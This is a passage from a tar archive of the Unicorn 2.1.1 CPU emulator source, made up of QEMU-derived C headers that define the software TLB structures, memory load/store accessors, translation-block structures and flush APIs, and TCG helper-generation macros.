target_ulong addr_code; target_ulong paddr; /* Addend to virtual address to get host address. IO accesses use the corresponding iotlb value. */ uintptr_t addend; }; /* padding to get a power of two size */ uint8_t dummy[1 << CPU_TLB_ENTRY_BITS]; }; } CPUTLBEntry; QEMU_BUILD_BUG_ON(sizeof(CPUTLBEntry) != (1 << CPU_TLB_ENTRY_BITS)); /* The IOTLB is not accessed directly inline by generated TCG code, * so the CPUIOTLBEntry layout is not as critical as that of the * CPUTLBEntry. (This is also why we don't want to combine the two * structs into one.) */ typedef struct CPUIOTLBEntry { /* * @addr contains: * - in the lower TARGET_PAGE_BITS, a physical section number * - with the lower TARGET_PAGE_BITS masked off, an offset which * must be added to the virtual address to obtain: * + the ram_addr_t of the target RAM (if the physical section * number is PHYS_SECTION_NOTDIRTY or PHYS_SECTION_ROM) * + the offset within the target MemoryRegion (otherwise) */ hwaddr addr; MemTxAttrs attrs; } CPUIOTLBEntry; /* * Data elements that are per MMU mode, minus the bits accessed by * the TCG fast path. */ typedef struct CPUTLBDesc { /* * Describe a region covering all of the large pages allocated * into the tlb. When any page within this region is flushed, * we must flush the entire tlb. The region is matched if * (addr & large_page_mask) == large_page_addr. */ target_ulong large_page_addr; target_ulong large_page_mask; /* host time (in ns) at the beginning of the time window */ int64_t window_begin_ns; /* maximum number of entries observed in the window */ size_t window_max_entries; size_t n_used_entries; /* The next index to use in the tlb victim table. */ size_t vindex; /* The tlb victim table, in two parts. */ CPUTLBEntry vtable[CPU_VTLB_SIZE]; CPUIOTLBEntry viotlb[CPU_VTLB_SIZE]; /* The iotlb. */ CPUIOTLBEntry *iotlb; } CPUTLBDesc; /* * Data elements that are per MMU mode, accessed by the fast path. * The structure is aligned to aid loading the pair with one insn. */ typedef struct CPUTLBDescFast { /* Contains (n_entries - 1) << CPU_TLB_ENTRY_BITS */ uintptr_t mask; /* The array of tlb entries itself. */ CPUTLBEntry *table; } CPUTLBDescFast QEMU_ALIGNED(2 * sizeof(void *)); /* * Data elements that are shared between all MMU modes. */ typedef struct CPUTLBCommon { /* * Within dirty, for each bit N, modifications have been made to * mmu_idx N since the last time that mmu_idx was flushed. * Protected by tlb_c.lock. */ uint16_t dirty; /* * Statistics. These are not lock protected, but are read and * written atomically. This allows the monitor to print a snapshot * of the stats without interfering with the cpu. */ size_t full_flush_count; size_t part_flush_count; size_t elide_flush_count; } CPUTLBCommon; /* * The entire softmmu tlb, for all MMU modes. * The meaning of each of the MMU modes is defined in the target code. * Since this is placed within CPUNegativeOffsetState, the smallest * negative offsets are at the end of the struct. */ typedef struct CPUTLB { CPUTLBCommon c; CPUTLBDesc d[NB_MMU_MODES]; CPUTLBDescFast f[NB_MMU_MODES]; } CPUTLB; /* This will be used by TCG backends to compute offsets. */ #define TLB_MASK_TABLE_OFS(IDX) \ ((int)offsetof(ArchCPU, neg.tlb.f[IDX]) - (int)offsetof(ArchCPU, env)) /* * This structure must be placed in ArchCPU immediately * before CPUArchState, as a field named "neg". */ typedef struct CPUNegativeOffsetState { CPUTLB tlb; IcountDecr icount_decr; } CPUNegativeOffsetState; #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/cpu_ldst.h����������������������������������������������������������0000664�0000000�0000000�00000014502�14675241067�0020512�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Software MMU support * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. * */ /* * Generate inline load/store functions for all MMU modes (typically * at least _user and _kernel) as well as _data versions, for all data * sizes. * * Used by target op helpers. * * The syntax for the accessors is: * * load: cpu_ld{sign}{size}_{mmusuffix}(env, ptr) * cpu_ld{sign}{size}_{mmusuffix}_ra(env, ptr, retaddr) * cpu_ld{sign}{size}_mmuidx_ra(env, ptr, mmu_idx, retaddr) * * store: cpu_st{size}_{mmusuffix}(env, ptr, val) * cpu_st{size}_{mmusuffix}_ra(env, ptr, val, retaddr) * cpu_st{size}_mmuidx_ra(env, ptr, val, mmu_idx, retaddr) * * sign is: * (empty): for 32 and 64 bit sizes * u : unsigned * s : signed * * size is: * b: 8 bits * w: 16 bits * l: 32 bits * q: 64 bits * * mmusuffix is one of the generic suffixes "data" or "code", or "mmuidx". * The "mmuidx" suffix carries an extra mmu_idx argument that specifies * the index to use; the "data" and "code" suffixes take the index from * cpu_mmu_index(). */ #ifndef CPU_LDST_H #define CPU_LDST_H #include "cpu-defs.h" #include "cpu.h" typedef target_ulong abi_ptr; #define TARGET_ABI_FMT_ptr TARGET_ABI_FMT_lx uint32_t cpu_ldub_data(CPUArchState *env, abi_ptr ptr); uint32_t cpu_lduw_data(CPUArchState *env, abi_ptr ptr); uint32_t cpu_ldl_data(CPUArchState *env, abi_ptr ptr); uint64_t cpu_ldq_data(CPUArchState *env, abi_ptr ptr); int cpu_ldsb_data(CPUArchState *env, abi_ptr ptr); int cpu_ldsw_data(CPUArchState *env, abi_ptr ptr); uint32_t cpu_ldub_data_ra(CPUArchState *env, abi_ptr ptr, uintptr_t retaddr); uint32_t cpu_lduw_data_ra(CPUArchState *env, abi_ptr ptr, uintptr_t retaddr); uint32_t cpu_ldl_data_ra(CPUArchState *env, abi_ptr ptr, uintptr_t retaddr); uint64_t cpu_ldq_data_ra(CPUArchState *env, abi_ptr ptr, uintptr_t retaddr); int cpu_ldsb_data_ra(CPUArchState *env, abi_ptr ptr, uintptr_t retaddr); int cpu_ldsw_data_ra(CPUArchState *env, abi_ptr ptr, uintptr_t retaddr); void cpu_stb_data(CPUArchState *env, abi_ptr ptr, uint32_t val); void cpu_stw_data(CPUArchState *env, abi_ptr ptr, uint32_t val); void cpu_stl_data(CPUArchState *env, abi_ptr ptr, uint32_t val); void cpu_stq_data(CPUArchState *env, abi_ptr ptr, uint64_t val); void cpu_stb_data_ra(CPUArchState *env, abi_ptr ptr, uint32_t val, uintptr_t retaddr); void cpu_stw_data_ra(CPUArchState *env, abi_ptr ptr, uint32_t val, uintptr_t retaddr); void cpu_stl_data_ra(CPUArchState *env, abi_ptr ptr, uint32_t val, uintptr_t retaddr); void cpu_stq_data_ra(CPUArchState *env, abi_ptr ptr, uint64_t val, uintptr_t retaddr); /* Needed for TCG_OVERSIZED_GUEST */ #include "tcg/tcg.h" static inline target_ulong tlb_addr_write(const CPUTLBEntry *entry) { return entry->addr_write; } /* Find the TLB index corresponding to the mmu_idx + address pair. */ static inline uintptr_t tlb_index(CPUArchState *env, uintptr_t mmu_idx, target_ulong addr) { #ifdef TARGET_ARM struct uc_struct *uc = env->uc; #endif uintptr_t size_mask = env_tlb(env)->f[mmu_idx].mask >> CPU_TLB_ENTRY_BITS; return (addr >> TARGET_PAGE_BITS) & size_mask; } /* Find the TLB entry corresponding to the mmu_idx + address pair. */ static inline CPUTLBEntry *tlb_entry(CPUArchState *env, uintptr_t mmu_idx, target_ulong addr) { return &env_tlb(env)->f[mmu_idx].table[tlb_index(env, mmu_idx, addr)]; } uint32_t cpu_ldub_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra); uint32_t cpu_lduw_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra); uint32_t cpu_ldl_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra); uint64_t cpu_ldq_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra); int cpu_ldsb_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra); int cpu_ldsw_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra); void cpu_stb_mmuidx_ra(CPUArchState *env, abi_ptr addr, uint32_t val, int mmu_idx, uintptr_t retaddr); void cpu_stw_mmuidx_ra(CPUArchState *env, abi_ptr addr, uint32_t val, int mmu_idx, uintptr_t retaddr); void cpu_stl_mmuidx_ra(CPUArchState *env, abi_ptr addr, uint32_t val, int mmu_idx, uintptr_t retaddr); void cpu_stq_mmuidx_ra(CPUArchState *env, abi_ptr addr, uint64_t val, int mmu_idx, uintptr_t retaddr); uint32_t cpu_ldub_code(CPUArchState *env, abi_ptr addr); uint32_t cpu_lduw_code(CPUArchState *env, abi_ptr addr); uint32_t cpu_ldl_code(CPUArchState *env, abi_ptr addr); uint64_t cpu_ldq_code(CPUArchState *env, abi_ptr addr); static inline int cpu_ldsb_code(CPUArchState *env, abi_ptr addr) { return (int8_t)cpu_ldub_code(env, addr); } static inline int cpu_ldsw_code(CPUArchState *env, abi_ptr addr) { return (int16_t)cpu_lduw_code(env, addr); } /** * tlb_vaddr_to_host: * @env: CPUArchState * @addr: guest virtual address to look up * @access_type: 0 for read, 1 for write, 2 for execute * @mmu_idx: MMU index to use for lookup * * Look up the specified guest virtual index in the TCG softmmu TLB. * If we can translate a host virtual address suitable for direct RAM * access, without causing a guest exception, then return it. * Otherwise (TLB entry is for an I/O access, guest software * TLB fill required, etc) return NULL. */ void *tlb_vaddr_to_host(CPUArchState *env, abi_ptr addr, MMUAccessType access_type, int mmu_idx); #endif /* CPU_LDST_H */ ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/cputlb.h������������������������������������������������������������0000664�0000000�0000000�00000001710�14675241067�0020163�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Common CPU TLB handling * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef CPUTLB_H #define CPUTLB_H #include "exec/cpu-common.h" /* cputlb.c */ void tlb_protect_code(struct uc_struct *uc, ram_addr_t ram_addr); void tlb_unprotect_code(struct uc_struct *uc, ram_addr_t ram_addr); #endif ��������������������������������������������������������unicorn-2.1.1/qemu/include/exec/exec-all.h����������������������������������������������������������0000664�0000000�0000000�00000044141�14675241067�0020371�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * internal execution defines for qemu * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef EXEC_ALL_H #define EXEC_ALL_H #include "hw/core/cpu.h" #include "exec/tb-context.h" #include "exec/cpu_ldst.h" #include "sysemu/cpus.h" /* allow to see translation results - the slowdown should be negligible, so we leave it */ #define DEBUG_DISAS /* Page tracking code uses ram addresses in system mode, and virtual addresses in userspace mode. Define tb_page_addr_t to be an appropriate type. */ typedef ram_addr_t tb_page_addr_t; #define TB_PAGE_ADDR_FMT RAM_ADDR_FMT #include "qemu/log.h" void gen_intermediate_code(CPUState *cpu, TranslationBlock *tb, int max_insns); void restore_state_to_opc(CPUArchState *env, TranslationBlock *tb, target_ulong *data); /** * cpu_restore_state: * @cpu: the vCPU state is to be restore to * @searched_pc: the host PC the fault occurred at * @will_exit: true if the TB executed will be interrupted after some cpu adjustments. Required for maintaining the correct icount valus * @return: true if state was restored, false otherwise * * Attempt to restore the state for a fault occurring in translated * code. If the searched_pc is not in translated code no state is * restored and the function returns false. */ bool cpu_restore_state(CPUState *cpu, uintptr_t searched_pc, bool will_exit); void QEMU_NORETURN cpu_loop_exit_noexc(CPUState *cpu); void QEMU_NORETURN cpu_io_recompile(CPUState *cpu, uintptr_t retaddr); TranslationBlock *tb_gen_code(CPUState *cpu, target_ulong pc, target_ulong cs_base, uint32_t flags, int cflags); void QEMU_NORETURN cpu_loop_exit(CPUState *cpu); void QEMU_NORETURN cpu_loop_exit_restore(CPUState *cpu, uintptr_t pc); void QEMU_NORETURN cpu_loop_exit_atomic(CPUState *cpu, uintptr_t pc); /** * cpu_loop_exit_requested: * @cpu: The CPU state to be tested * * Indicate if somebody asked for a return of the CPU to the main loop * (e.g., via cpu_exit() or cpu_interrupt()). * * This is helpful for architectures that support interruptible * instructions. After writing back all state to registers/memory, this * call can be used to check if it makes sense to return to the main loop * or to continue executing the interruptible instruction. */ static inline bool cpu_loop_exit_requested(CPUState *cpu) { return (int32_t)cpu_neg(cpu)->icount_decr.u32 < 0; } void cpu_reloading_memory_map(void); /** * cpu_address_space_init: * @cpu: CPU to add this address space to * @asidx: integer index of this address space * @mr: the root memory region of address space * * Add the specified address space to the CPU's cpu_ases list. * The address space added with @asidx 0 is the one used for the * convenience pointer cpu->as. * The target-specific code which registers ASes is responsible * for defining what semantics address space 0, 1, 2, etc have. * * Before the first call to this function, the caller must set * cpu->num_ases to the total number of address spaces it needs * to support. */ void cpu_address_space_init(CPUState *cpu, int asidx, MemoryRegion *mr); /* cputlb.c */ /** * tlb_init - initialize a CPU's TLB * @cpu: CPU whose TLB should be initialized */ void tlb_init(CPUState *cpu); /** * tlb_flush_page: * @cpu: CPU whose TLB should be flushed * @addr: virtual address of page to be flushed * * Flush one page from the TLB of the specified CPU, for all * MMU indexes. */ void tlb_flush_page(CPUState *cpu, target_ulong addr); /** * tlb_flush_page_all_cpus: * @cpu: src CPU of the flush * @addr: virtual address of page to be flushed * * Flush one page from the TLB of the specified CPU, for all * MMU indexes. */ void tlb_flush_page_all_cpus(CPUState *src, target_ulong addr); /** * tlb_flush_page_all_cpus_synced: * @cpu: src CPU of the flush * @addr: virtual address of page to be flushed * * Flush one page from the TLB of the specified CPU, for all MMU * indexes like tlb_flush_page_all_cpus except the source vCPUs work * is scheduled as safe work meaning all flushes will be complete once * the source vCPUs safe work is complete. This will depend on when * the guests translation ends the TB. */ void tlb_flush_page_all_cpus_synced(CPUState *src, target_ulong addr); /** * tlb_flush: * @cpu: CPU whose TLB should be flushed * * Flush the entire TLB for the specified CPU. Most CPU architectures * allow the implementation to drop entries from the TLB at any time * so this is generally safe. If more selective flushing is required * use one of the other functions for efficiency. */ void tlb_flush(CPUState *cpu); /** * tlb_flush_all_cpus: * @cpu: src CPU of the flush */ void tlb_flush_all_cpus(CPUState *src_cpu); /** * tlb_flush_all_cpus_synced: * @cpu: src CPU of the flush * * Like tlb_flush_all_cpus except this except the source vCPUs work is * scheduled as safe work meaning all flushes will be complete once * the source vCPUs safe work is complete. This will depend on when * the guests translation ends the TB. */ void tlb_flush_all_cpus_synced(CPUState *src_cpu); /** * tlb_flush_page_by_mmuidx: * @cpu: CPU whose TLB should be flushed * @addr: virtual address of page to be flushed * @idxmap: bitmap of MMU indexes to flush * * Flush one page from the TLB of the specified CPU, for the specified * MMU indexes. */ void tlb_flush_page_by_mmuidx(CPUState *cpu, target_ulong addr, uint16_t idxmap); /** * tlb_flush_page_by_mmuidx_all_cpus: * @cpu: Originating CPU of the flush * @addr: virtual address of page to be flushed * @idxmap: bitmap of MMU indexes to flush * * Flush one page from the TLB of all CPUs, for the specified * MMU indexes. */ void tlb_flush_page_by_mmuidx_all_cpus(CPUState *cpu, target_ulong addr, uint16_t idxmap); /** * tlb_flush_page_by_mmuidx_all_cpus_synced: * @cpu: Originating CPU of the flush * @addr: virtual address of page to be flushed * @idxmap: bitmap of MMU indexes to flush * * Flush one page from the TLB of all CPUs, for the specified MMU * indexes like tlb_flush_page_by_mmuidx_all_cpus except the source * vCPUs work is scheduled as safe work meaning all flushes will be * complete once the source vCPUs safe work is complete. This will * depend on when the guests translation ends the TB. */ void tlb_flush_page_by_mmuidx_all_cpus_synced(CPUState *cpu, target_ulong addr, uint16_t idxmap); /** * tlb_flush_by_mmuidx: * @cpu: CPU whose TLB should be flushed * @wait: If true ensure synchronisation by exiting the cpu_loop * @idxmap: bitmap of MMU indexes to flush * * Flush all entries from the TLB of the specified CPU, for the specified * MMU indexes. */ void tlb_flush_by_mmuidx(CPUState *cpu, uint16_t idxmap); /** * tlb_flush_by_mmuidx_all_cpus: * @cpu: Originating CPU of the flush * @idxmap: bitmap of MMU indexes to flush * * Flush all entries from all TLBs of all CPUs, for the specified * MMU indexes. */ void tlb_flush_by_mmuidx_all_cpus(CPUState *cpu, uint16_t idxmap); /** * tlb_flush_by_mmuidx_all_cpus_synced: * @cpu: Originating CPU of the flush * @idxmap: bitmap of MMU indexes to flush * * Flush all entries from all TLBs of all CPUs, for the specified * MMU indexes like tlb_flush_by_mmuidx_all_cpus except except the source * vCPUs work is scheduled as safe work meaning all flushes will be * complete once the source vCPUs safe work is complete. This will * depend on when the guests translation ends the TB. */ void tlb_flush_by_mmuidx_all_cpus_synced(CPUState *cpu, uint16_t idxmap); /** * tlb_set_page_with_attrs: * @cpu: CPU to add this TLB entry for * @vaddr: virtual address of page to add entry for * @paddr: physical address of the page * @attrs: memory transaction attributes * @prot: access permissions (PAGE_READ/PAGE_WRITE/PAGE_EXEC bits) * @mmu_idx: MMU index to insert TLB entry for * @size: size of the page in bytes * * Add an entry to this CPU's TLB (a mapping from virtual address * @vaddr to physical address @paddr) with the specified memory * transaction attributes. This is generally called by the target CPU * specific code after it has been called through the tlb_fill() * entry point and performed a successful page table walk to find * the physical address and attributes for the virtual address * which provoked the TLB miss. * * At most one entry for a given virtual address is permitted. Only a * single TARGET_PAGE_SIZE region is mapped; the supplied @size is only * used by tlb_flush_page. */ void tlb_set_page_with_attrs(CPUState *cpu, target_ulong vaddr, hwaddr paddr, MemTxAttrs attrs, int prot, int mmu_idx, target_ulong size); /* tlb_set_page: * * This function is equivalent to calling tlb_set_page_with_attrs() * with an @attrs argument of MEMTXATTRS_UNSPECIFIED. It's provided * as a convenience for CPUs which don't use memory transaction attributes. */ void tlb_set_page(CPUState *cpu, target_ulong vaddr, hwaddr paddr, int prot, int mmu_idx, target_ulong size); void *probe_access(CPUArchState *env, target_ulong addr, int size, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); static inline void *probe_write(CPUArchState *env, target_ulong addr, int size, int mmu_idx, uintptr_t retaddr) { return probe_access(env, addr, size, MMU_DATA_STORE, mmu_idx, retaddr); } static inline void *probe_read(CPUArchState *env, target_ulong addr, int size, int mmu_idx, uintptr_t retaddr) { return probe_access(env, addr, size, MMU_DATA_LOAD, mmu_idx, retaddr); } #define CODE_GEN_ALIGN 16 /* must be >= of the size of a icache line */ /* Estimated block size for TB allocation. */ /* ??? The following is based on a 2015 survey of x86_64 host output. Better would seem to be some sort of dynamically sized TB array, adapting to the block sizes actually being produced. */ #define CODE_GEN_AVG_BLOCK_SIZE 400 /* * Translation Cache-related fields of a TB. * This struct exists just for convenience; we keep track of TB's in a binary * search tree, and the only fields needed to compare TB's in the tree are * @ptr and @size. * Note: the address of search data can be obtained by adding @size to @ptr. */ struct tb_tc { void *ptr; /* pointer to the translated code */ size_t size; }; struct TranslationBlock { target_ulong pc; /* simulated PC corresponding to this block (EIP + CS base) */ target_ulong cs_base; /* CS base for this block */ uint32_t flags; /* flags defining in which context the code was generated */ uint16_t size; /* size of target code for this block (1 <= size <= TARGET_PAGE_SIZE) */ uint16_t icount; uint32_t cflags; /* compile flags */ #define CF_COUNT_MASK 0x00007fff #define CF_LAST_IO 0x00008000 /* Last insn may be an IO access. */ #define CF_NOCACHE 0x00010000 /* To be freed after execution */ #define CF_USE_ICOUNT 0x00020000 #define CF_INVALID 0x00040000 /* TB is stale. Set with @jmp_lock held */ #define CF_PARALLEL 0x00080000 /* Generate code for a parallel context */ #define CF_CLUSTER_MASK 0xff000000 /* Top 8 bits are cluster ID */ #define CF_CLUSTER_SHIFT 24 /* cflags' mask for hashing/comparison */ #define CF_HASH_MASK \ (CF_COUNT_MASK | CF_LAST_IO | CF_USE_ICOUNT | CF_PARALLEL | CF_CLUSTER_MASK) /* Per-vCPU dynamic tracing state used to generate this TB */ uint32_t trace_vcpu_dstate; struct tb_tc tc; /* original tb when cflags has CF_NOCACHE */ struct TranslationBlock *orig_tb; /* first and second physical page containing code. The lower bit of the pointer tells the index in page_next[]. The list is protected by the TB's page('s) lock(s) */ uintptr_t page_next[2]; tb_page_addr_t page_addr[2]; /* The following data are used to directly call another TB from * the code of this one. This can be done either by emitting direct or * indirect native jump instructions. These jumps are reset so that the TB * just continues its execution. The TB can be linked to another one by * setting one of the jump targets (or patching the jump instruction). Only * two of such jumps are supported. */ uint16_t jmp_reset_offset[2]; /* offset of original jump target */ #define TB_JMP_RESET_OFFSET_INVALID 0xffff /* indicates no jump generated */ uintptr_t jmp_target_arg[2]; /* target address or offset */ /* * Each TB has a NULL-terminated list (jmp_list_head) of incoming jumps. * Each TB can have two outgoing jumps, and therefore can participate * in two lists. The list entries are kept in jmp_list_next[2]. The least * significant bit (LSB) of the pointers in these lists is used to encode * which of the two list entries is to be used in the pointed TB. * * List traversals are protected by jmp_lock. The destination TB of each * outgoing jump is kept in jmp_dest[] so that the appropriate jmp_lock * can be acquired from any origin TB. * * jmp_dest[] are tagged pointers as well. The LSB is set when the TB is * being invalidated, so that no further outgoing jumps from it can be set. * * jmp_lock also protects the CF_INVALID cflag; a jump must not be chained * to a destination TB that has CF_INVALID set. */ uintptr_t jmp_list_head; uintptr_t jmp_list_next[2]; uintptr_t jmp_dest[2]; uint32_t hash; // unicorn needs this hash to remove this TB from QHT cache }; // extern bool parallel_cpus; /* Hide the atomic_read to make code a little easier on the eyes */ static inline uint32_t tb_cflags(const TranslationBlock *tb) { return tb->cflags; } /* current cflags for hashing/comparison */ static inline uint32_t curr_cflags(void) { return 0; } /* TranslationBlock invalidate API */ void tb_invalidate_phys_addr(AddressSpace *as, hwaddr addr, MemTxAttrs attrs); void tb_flush(CPUState *cpu); void tb_phys_invalidate(TCGContext *tcg_ctx, TranslationBlock *tb, tb_page_addr_t page_addr); TranslationBlock *tb_htable_lookup(CPUState *cpu, target_ulong pc, target_ulong cs_base, uint32_t flags, uint32_t cf_mask); void tb_set_jmp_target(TranslationBlock *tb, int n, uintptr_t addr); void tb_exec_lock(struct uc_struct*); void tb_exec_unlock(struct uc_struct*); /* GETPC is the true target of the return instruction that we'll execute. */ #ifdef _MSC_VER #include <intrin.h> # define GETPC() (uintptr_t)_ReturnAddress() #else # define GETPC() \ ((uintptr_t)__builtin_extract_return_addr(__builtin_return_address(0))) #endif /* The true return address will often point to a host insn that is part of the next translated guest insn. Adjust the address backward to point to the middle of the call insn. Subtracting one would do the job except for several compressed mode architectures (arm, mips) which set the low bit to indicate the compressed mode; subtracting two works around that. It is also the case that there are no host isas that contain a call insn smaller than 4 bytes, so we don't worry about special-casing this. */ #define GETPC_ADJ 2 #if defined(CONFIG_DEBUG_TCG) void assert_no_pages_locked(void); #else static inline void assert_no_pages_locked(void) { } #endif /** * iotlb_to_section: * @cpu: CPU performing the access * @index: TCG CPU IOTLB entry * * Given a TCG CPU IOTLB entry, return the MemoryRegionSection that * it refers to. @index will have been initially created and returned * by memory_region_section_get_iotlb(). */ struct MemoryRegionSection *iotlb_to_section(CPUState *cpu, hwaddr index, MemTxAttrs attrs); static inline void mmap_lock(void) {} static inline void mmap_unlock(void) {} /** * get_page_addr_code() - full-system version * @env: CPUArchState * @addr: guest virtual address of guest code * * If we cannot translate and execute from the entire RAM page, or if * the region is not backed by RAM, returns -1. Otherwise, returns the * ram_addr_t corresponding to the guest code at @addr. * * Note: this function can trigger an exception. */ tb_page_addr_t get_page_addr_code(CPUArchState *env, target_ulong addr); /** * get_page_addr_code_hostp() - full-system version * @env: CPUArchState * @addr: guest virtual address of guest code * * See get_page_addr_code() (full-system version) for documentation on the * return value. * * Sets *@hostp (when @hostp is non-NULL) as follows. * If the return value is -1, sets *@hostp to NULL. Otherwise, sets *@hostp * to the host address where @addr's content is kept. * * Note: this function can trigger an exception. */ tb_page_addr_t get_page_addr_code_hostp(CPUArchState *env, target_ulong addr, void **hostp); void tlb_reset_dirty(CPUState *cpu, ram_addr_t start1, ram_addr_t length); void tlb_reset_dirty_by_vaddr(CPUState *cpu, target_ulong start1, target_ulong length); void tlb_set_dirty(CPUState *cpu, target_ulong vaddr); /* exec.c */ void tb_flush_jmp_cache(CPUState *cpu, target_ulong addr); MemoryRegionSection * address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr, hwaddr *xlat, hwaddr *plen, MemTxAttrs attrs, int *prot); hwaddr memory_region_section_get_iotlb(CPUState *cpu, MemoryRegionSection *section); #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/gen-icount.h��������������������������������������������������������0000664�0000000�0000000�00000003545�14675241067�0020752�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef GEN_ICOUNT_H #define GEN_ICOUNT_H #include "qemu/timer.h" /* Helpers for instruction counting code generation. */ static inline void gen_io_start(TCGContext *tcg_ctx) { TCGv_i32 tmp = tcg_const_i32(tcg_ctx, 1); tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(ArchCPU, parent_obj.can_do_io) - offsetof(ArchCPU, env)); tcg_temp_free_i32(tcg_ctx, tmp); } /* * cpu->can_do_io is cleared automatically at the beginning of * each translation block. The cost is minimal and only paid * for -icount, plus it would be very easy to forget doing it * in the translator. Therefore, backends only need to call * gen_io_start. */ static inline void gen_io_end(TCGContext *tcg_ctx) { TCGv_i32 tmp = tcg_const_i32(tcg_ctx, 0); tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(ArchCPU, parent_obj.can_do_io) - offsetof(ArchCPU, env)); tcg_temp_free_i32(tcg_ctx, tmp); } static inline void gen_tb_start(TCGContext *tcg_ctx, TranslationBlock *tb) { TCGv_i32 count; tcg_ctx->exitreq_label = gen_new_label(tcg_ctx); count = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, count, tcg_ctx->cpu_env, offsetof(ArchCPU, neg.icount_decr.u32) - offsetof(ArchCPU, env)); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, count, 0, tcg_ctx->exitreq_label); tcg_temp_free_i32(tcg_ctx, count); } static inline void gen_tb_end(TCGContext *tcg_ctx, TranslationBlock *tb, int num_insns) { if (tb_cflags(tb) & CF_USE_ICOUNT) { /* Update the num_insn immediate parameter now that we know * the actual insn count. */ tcg_set_insn_param(tcg_ctx->icount_start_insn, 1, num_insns); } gen_set_label(tcg_ctx, tcg_ctx->exitreq_label); tcg_gen_exit_tb(tcg_ctx, tb, TB_EXIT_REQUESTED); } #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/helper-gen.h��������������������������������������������������������0000664�0000000�0000000�00000011451�14675241067�0020723�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Helper file for declaring TCG helper functions. This one expands generation functions for tcg opcodes. */ #ifndef HELPER_GEN_H #define HELPER_GEN_H #include "exec/helper-head.h" #define DEF_HELPER_FLAGS_0(name, flags, ret) \ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl0(ret)) \ { \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 0, NULL); \ } #define DEF_HELPER_FLAGS_1(name, flags, ret, t1) \ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ dh_arg_decl(t1, 1)) \ { \ TCGTemp *args[1] = { dh_arg(t1, 1) }; \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 1, args); \ } #define DEF_HELPER_FLAGS_2(name, flags, ret, t1, t2) \ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ dh_arg_decl(t1, 1), dh_arg_decl(t2, 2)) \ { \ TCGTemp *args[2] = { dh_arg(t1, 1), dh_arg(t2, 2) }; \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 2, args); \ } #define DEF_HELPER_FLAGS_3(name, flags, ret, t1, t2, t3) \ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), dh_arg_decl(t3, 3)) \ { \ TCGTemp *args[3] = { dh_arg(t1, 1), dh_arg(t2, 2), dh_arg(t3, 3) }; \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 3, args); \ } #define DEF_HELPER_FLAGS_4(name, flags, ret, t1, t2, t3, t4) \ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), \ 